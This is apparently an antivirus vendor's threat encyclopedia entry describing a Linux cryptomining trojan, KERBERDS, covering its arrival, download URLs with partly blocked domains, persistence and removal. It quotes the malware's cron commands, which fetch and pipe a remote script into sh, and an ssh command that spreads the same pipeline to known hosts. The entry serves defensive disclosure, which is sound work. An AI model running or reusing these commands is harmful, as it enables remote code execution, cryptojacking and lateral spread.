Trojan.SH.KERBERDS.A
Linux
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
Downloaded from the Internet
This new version of KERBERDS, a cryptomining malware that uses an ld.so.preload-based rootkit for stealth, now hides CNC traffic in DNS TXT records.
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
3,796 bytes
Other
No
24 Oct 2019
Connects to URLs/IPs
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download Routine
This Trojan connects to the following website(s) to download and execute a malicious file:
- http://img.{BLOCKED}t.com/chatres/89/msg/20191022/78e3582c42824f17aba17feefb87ea5f.png - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- http://img.{BLOCKED}t.com/chatres/89/msg/20191022/2be662ee79084035914e9d6a6d6be10d.png - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
- http://cdn.{BLOCKED}oai.com/cvd/dist/fileUpload/1571723350789/0.25579108623802416.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- http://cdn.{BLOCKED}oai.com/cvd/dist/fileUpload/1571723382710/9.915787746614242.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
- https://user-images.{BLOCKED}usercontent.com/56861392/67261951-83ebf080-f4d5-11e9-9807-d0919c3b4b74.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (64-bit)
- https://user-images.{BLOCKED}usercontent.com/56861392/67262078-0aa0cd80-f4d6-11e9-8639-63829755ed31.jpg - detected as Trojan.Linux.KERBERDS.UWEJL (32-bit)
It saves the files it downloads using the following names:
- 48f14124d703c2
Other Details
This Trojan does the following:
- It creates the following cron jobs for persistence:
- Path: /var/spool/cron/crontabs/root
Schedule: Every 10 minutes
Command: */10 * * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh - Path: /etc/crontab
Schedule: Every 10 minutes
Command: */10 * * * * root (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen("http://lsd.{BLOCKED}ten.org").read()'||/usr/local/sbin/48f14124d703c2)|sh
- Path: /var/spool/cron/crontabs/root
- It removes the immutable property of the following files:
- /etc/cron*
- /var/spool/cron*
- It executes the following command on every host in the known_hosts file via ssh:
- (curl -fsSL lsd.{BLOCKED}ten.org||wget -q -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh >/dev/null 2>&1 &
SOLUTION
9.850
15.450.07
24 Oct 2019
15.451.00
25 Oct 2019
Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.KERBERDS.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Did this description help? Tell us how we did.